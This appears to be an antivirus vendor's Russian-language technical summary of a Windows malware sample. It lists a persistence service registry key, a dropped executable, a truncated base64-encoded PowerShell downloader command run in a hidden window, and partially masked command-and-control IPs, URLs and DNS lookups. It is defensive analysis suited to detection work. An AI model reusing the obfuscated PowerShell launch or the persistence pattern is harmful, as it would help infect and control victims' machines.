Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\virtdisk] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\virtdisk] 'ImagePath' = '"<SYSTEM32>\RelPost\virtdisk.exe"'
- 'virtdisk' "<SYSTEM32>\RelPost\virtdisk.exe"
- 'virtdisk' <SYSTEM32>\RelPost\virtdisk.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...
- %HOMEPATH%\700.exe
- <SYSTEM32>\relpost\virtdisk.exe
- %HOMEPATH%\700.exe в <SYSTEM32>\relpost\virtdisk.exe
- '20#.#71.150.41':443
- '94.##.247.61':8080
- '21#.#76.36.147':8080
- '87.##6.46.107':8080
- '20#.#36.123.42':8080
- '81.##8.69.61':80
- '77.##.136.129':8080
- http://ha####shomes.net/abouts/G56G/
- http://ik##i24.com/adsl/AJ55/
- http://www.vi##-all.ch/js/BJMp5490/
- DNS ASK ha####shomes.net
- DNS ASK ik##i24.com
- DNS ASK vi##-all.ch
- DNS ASK go####soccer.com
- DNS ASK id###oft.com
- '%HOMEPATH%\700.exe'
- '<SYSTEM32>\relpost\virtdisk.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAFMASQBKAFcAbQByAHMAPQAnAFYAVwBWAEsASgBmAHAAaAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAdQBgAFIASQB0AFkAcAByAG8AVABPAEMAbwBMACIAIAA9AC...' (со скрытым окном)